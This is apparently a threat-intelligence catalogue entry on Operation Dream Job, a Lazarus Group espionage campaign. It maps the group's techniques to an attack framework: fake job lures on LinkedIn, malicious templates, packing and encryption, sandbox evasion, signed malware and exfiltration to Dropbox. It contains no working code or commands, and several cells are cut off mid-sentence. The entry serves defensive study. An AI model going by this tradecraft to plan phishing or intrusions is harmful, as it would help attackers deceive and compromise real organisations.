Operation Dream Job
Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]
Associated Campaign Descriptions
Groups
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1087 | .002 | Account Discovery: Domain Account |
During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.[3] |
| Enterprise | T1583 | .001 | Acquire Infrastructure: Domains |
During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[3] |
| .004 | Acquire Infrastructure: Server |
During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[3] |
||
| .006 | Acquire Infrastructure: Web Services |
During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.[1] |
||
| Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.[2] |
| Enterprise | T1560 | .001 | Archive Collected Data: Archive via Utility |
During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.[3] |
| Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[2] |
| Enterprise | T1110 | Brute Force |
During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.[3] |
|
| Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[3] |
| .003 | Command and Scripting Interpreter: Windows Command Shell |
During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[3][2] |
||
| .005 | Command and Scripting Interpreter: Visual Basic |
During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.[1][2] |
||
| Enterprise | T1584 | .001 | Compromise Infrastructure: Domains |
For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[2][5] |
| .004 | Compromise Infrastructure: Server |
For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[1][3][2] |
||
| Enterprise | T1005 | Data from Local System |
During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[1][2] |
|
| Enterprise | T1622 | Debugger Evasion |
During Operation Dream Job, Lazarus Group used tools that used the |
|
| Enterprise | T1587 | .001 | Develop Capabilities: Malware |
For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[1][3][2][5] |
| .002 | Develop Capabilities: Code Signing Certificates |
During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[3] |
||
| Enterprise | T1573 | .001 | Encrypted Channel: Symmetric Cryptography |
During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[2] |
| Enterprise | T1585 | .001 | Establish Accounts: Social Media Accounts |
For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[1][3] |
| .002 | Establish Accounts: Email Accounts |
During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[3] |
||
| Enterprise | T1041 | Exfiltration Over C2 Channel |
During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[1] |
|
| Enterprise | T1567 | .002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage |
During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[3][1] |
| Enterprise | T1083 | File and Directory Discovery |
During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.[1] |
|
| Enterprise | T1589 | Gather Victim Identity Information |
For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.[1] |
|
| Enterprise | T1591 | Gather Victim Org Information |
For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[1] |
|
| .004 | Identify Roles |
During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[1][3] |
||
| Enterprise | T1656 | Impersonation |
During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[1][3][4] |
|
| Enterprise | T1070 | .004 | Indicator Removal: File Deletion |
During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[3] |
| Enterprise | T1105 | Ingress Tool Transfer |
During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[1][3][2] |
|
| Enterprise | T1534 | Internal Spearphishing |
During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[1] |
|
| Enterprise | T1036 | .008 | Masquerading: Masquerade File Type |
During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[2][3] |
| Enterprise | T1106 | Native API |
During Operation Dream Job, Lazarus Group used Windows API |
|
| Enterprise | T1027 | .002 | Obfuscated Files or Information: Software Packing |
During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[1][2][5] |
| .013 | Obfuscated Files or Information: Encrypted/Encoded File |
During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.[1][3][2][5] |
||
| Enterprise | T1588 | .002 | Obtain Capabilities: Tool |
For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[1][3] |
| .003 | Obtain Capabilities: Code Signing Certificates |
During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[3] |
||
| Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[1][2] |
| .002 | Phishing: Spearphishing Link |
During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[1][3] |
||
| .003 | Phishing: Spearphishing via Service |
During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[1][3] |
||
| Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[3] |
| Enterprise | T1593 | .001 | Search Open Websites/Domains: Social Media |
For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[3] |
| Enterprise | T1505 | .004 | Server Software Component: IIS Components |
During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.[2] |
| Enterprise | T1608 | .001 | Stage Capabilities: Upload Malware |
For Operation Dream Job, Lazarus Group used compromised servers to host malware.[1][3][2][5] |
| .002 | Stage Capabilities: Upload Tool |
For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[3] |
||
| Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[3] |
| Enterprise | T1218 | .010 | System Binary Proxy Execution: Regsvr32 |
During Operation Dream Job, Lazarus Group used |
| .011 | System Binary Proxy Execution: Rundll32 |
During Operation Dream Job, Lazarus Group executed malware with |
||
| Enterprise | T1614 | .001 | System Location Discovery: System Language Discovery |
During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[1] |
| Enterprise | T1221 | Template Injection |
During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.[1][2] |
|
| Enterprise | T1204 | .001 | User Execution: Malicious Link |
During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[1][3] |
| .002 | User Execution: Malicious File |
During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[1][2] |
||
| Enterprise | T1497 | .001 | Virtualization/Sandbox Evasion: System Checks |
During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[1] |
| .003 | Virtualization/Sandbox Evasion: Time Based Evasion |
During Operation Dream Job, Lazarus Group used tools that collected |
||
| Enterprise | T1047 | Windows Management Instrumentation |
During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.[3] |
|
| Enterprise | T1220 | XSL Script Processing |
During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[3] |
|
Software
| ID | Name | Description |
|---|---|---|
| S0694 | DRATzarus |
During Operation Dream Job, Lazarus Group used DRATzarus to deploy open source software and partly commodity software such as Responder, Wake-On-Lan, and ChromePass to target infected hosts.[1] |
| S0174 | Responder | |
| S0678 | Torisma |
During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[2][5] |
References
- ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
- Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
- Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.